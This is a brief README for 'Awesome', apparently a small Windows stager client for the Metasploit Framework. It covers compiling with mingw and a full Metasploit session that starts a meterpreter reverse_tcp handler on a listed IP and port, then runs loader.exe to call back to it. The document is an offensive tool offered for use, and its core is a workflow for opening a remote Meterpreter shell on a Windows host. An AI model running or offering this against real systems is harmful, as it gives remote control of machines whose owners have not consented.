Awesome
A quick stager client compatible with the Metasploit Framework
Reference:
- http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
- http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
Use:
- Start a multi/handler with your favorite windows reverse_tcp payload
- Run: loader.exe [host] [port]
How to compile:
- Install mingw
- Edit build.bat if mingw is installed somewhere other than c:\mingw
- run build.bat
ToDo:
- 64-bit compatability (see message #2)
- get a Windows build environment with make
How to use:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set LHOST 192.168.95.241
LHOST => 192.168.95.241
msf exploit(handler) > exploit -j
loader.exe 192.168.95.241 31337